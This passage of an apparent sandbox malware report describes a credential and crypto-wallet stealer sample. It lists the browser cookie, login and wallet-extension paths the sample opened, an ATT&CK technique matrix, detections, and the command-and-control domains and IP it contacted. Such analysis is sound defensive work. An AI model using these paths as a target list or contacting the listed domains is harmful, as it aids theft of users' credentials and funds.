              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6816, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6816, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Virtualization/Sandbox Evasion
              1
              OS Credential Dumping
              321
              Security Software Discovery
              Remote Services1
              Credential API Hooking
              21
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
              Deobfuscate/Decode Files or Information
              1
              Credential API Hooking
              11
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol1
              Archive Collected Data
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
              Obfuscated Files or Information
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin Shares31
              Data from Local System
              113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              NTDS1
              File and Directory Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets112
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.XPACK.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              greetclassifytalk.shop1%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%URL Reputationsafe
              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://support.microsof0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://greetclassifytalk.shop/api12%VirustotalBrowse
              shatterbreathepsw.shop1%VirustotalBrowse
              tolerateilusidjukl.shop1%VirustotalBrowse
              shortsvelventysjo.shop1%VirustotalBrowse
              incredibleextedwj.shop1%VirustotalBrowse
              liabilitynighstjsko.shop1%VirustotalBrowse
              demonstationfukewko.shop1%VirustotalBrowse
              greetclassifytalk.shop1%VirustotalBrowse
              https://greetclassifytalk.shop/1%VirustotalBrowse
              productivelookewr.shop1%VirustotalBrowse
              https://greetclassifytalk.shop:443/api12%VirustotalBrowse
              alcojoldwograpciw.shop1%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              greetclassifytalk.shop
              172.67.177.98
              truetrueunknown
              NameMaliciousAntivirus DetectionReputation
              incredibleextedwj.shoptrueunknown
              shortsvelventysjo.shoptrueunknown
              tolerateilusidjukl.shoptrueunknown
              https://greetclassifytalk.shop/apitrueunknown
              liabilitynighstjsko.shoptrueunknown
              shatterbreathepsw.shoptrueunknown
              demonstationfukewko.shoptrueunknown
              greetclassifytalk.shoptrueunknown
              productivelookewr.shoptrueunknown
              alcojoldwograpciw.shoptrueunknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1674099563.0000000003D88000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673861505.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://greetclassifytalk.shop/ntfile.exe, 00000000.00000003.1682855483.0000000000E3A000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1674099563.0000000003D88000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673861505.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgfile.exe, 00000000.00000003.1693486798.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1674099563.0000000003D88000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673861505.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://greetclassifytalk.shop/%Dfile.exe, 00000000.00000003.1664983879.0000000000E4B000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.file.exe, 00000000.00000003.1693486798.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1674099563.0000000003D88000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673861505.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1691804794.0000000003D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctafile.exe, 00000000.00000003.1693486798.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1674099563.0000000003D88000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673861505.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1691804794.0000000003D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016file.exe, 00000000.00000003.1673429503.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673523212.0000000003DC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17file.exe, 00000000.00000003.1673429503.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673523212.0000000003DC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1674099563.0000000003D88000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673861505.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://greetclassifytalk.shop/$Qfile.exe, 00000000.00000003.1691295811.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1691560780.0000000000EA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://greetclassifytalk.shop/)tO#file.exe, 00000000.00000003.1682855483.0000000000E3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://greetclassifytalk.shop/apiCzfile.exe, 00000000.00000003.1664983879.0000000000E4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://greetclassifytalk.shop/gtu#file.exe, 00000000.00000003.1682855483.0000000000E3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1692808922.0000000003E99000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://greetclassifytalk.shop/file.exe, 00000000.00000002.1745794964.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1664983879.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1745345269.0000000000EAD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746073047.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682855483.0000000000E3A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                  https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1674099563.0000000003D88000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673861505.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://greetclassifytalk.shop/apikfile.exe, 00000000.00000003.1664983879.0000000000E4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.1693486798.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.1693486798.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://x1.c.lencr.org/0file.exe, 00000000.00000003.1691804794.0000000003D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://x1.i.lencr.org/0file.exe, 00000000.00000003.1691804794.0000000003D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installfile.exe, 00000000.00000003.1673523212.0000000003DA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1674099563.0000000003D88000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673861505.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://greetclassifytalk.shop/api0file.exe, 00000000.00000003.1745362507.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1745794964.0000000000E8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://support.microsoffile.exe, 00000000.00000003.1673429503.0000000003DCE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1691804794.0000000003D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://greetclassifytalk.shop/api-file.exe, 00000000.00000003.1682855483.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1664983879.0000000000E4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesfile.exe, 00000000.00000003.1673523212.0000000003DA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1692808922.0000000003E99000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1674099563.0000000003D88000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673861505.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://greetclassifytalk.shop:443/apifile.exe, 00000000.00000003.1673148684.0000000000E3A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673941731.0000000000E3A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682855483.0000000000E3A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94file.exe, 00000000.00000003.1693486798.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        172.67.177.98
                                                                        greetclassifytalk.shopUnited States
                                                                        13335CLOUDFLARENETUStrue
                                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                                        Analysis ID:1429089
                                                                        Start date and time:2024-04-20 19:20:06 +02:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 3m 30s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:1
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:file.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HCA Information:
                                                                        • Successful, ratio: 91%
                                                                        • Number of executed functions: 34
                                                                        • Number of non-executed functions: 56
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Stop behavior analysis, all processes terminated
                                                                        • Excluded IPs from analysis (whitelisted): 40.127.169.103
                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        TimeTypeDescription
                                                                        19:20:56API Interceptor8x Sleep call for process: file.exe modified
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        172.67.177.982llKbb9pR7.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                                          MdeeRbWvqe.exeGet hashmaliciousLummaC, Babuk, Djvu, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            greetclassifytalk.shop2llKbb9pR7.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                                            • 172.67.177.98
                                                                            MdeeRbWvqe.exeGet hashmaliciousLummaC, Babuk, Djvu, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                                            • 172.67.177.98
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.51.78
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.51.78
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUS2M1NS61GG8.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                            • 172.67.129.243
                                                                            RrHuyQ4GzG.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.86.106
                                                                            https://track.enterprisetechsol.com/z.z?l=aHR0cHM6Ly9yZXNvdXJjZS5pdGJ1c2luZXNzdG9kYXkuY29tL3doaXRlcGFwZXJzLzQ0ODAzLU1pY3Jvc29mdC1DUEwtUTItUE1HLUFCTS1HZXItMS1sYW5kaW5nLnBocD9lPWJvbnVjY2VsbGkuZGFyaW9AZGVtZS1ncm91cC5jb20=&r=14547470367&d=12037165&p=1&t=h&h=fb97401a549b1167a78f6002a0aef94dGet hashmaliciousUnknownBrowse
                                                                            • 172.67.74.40
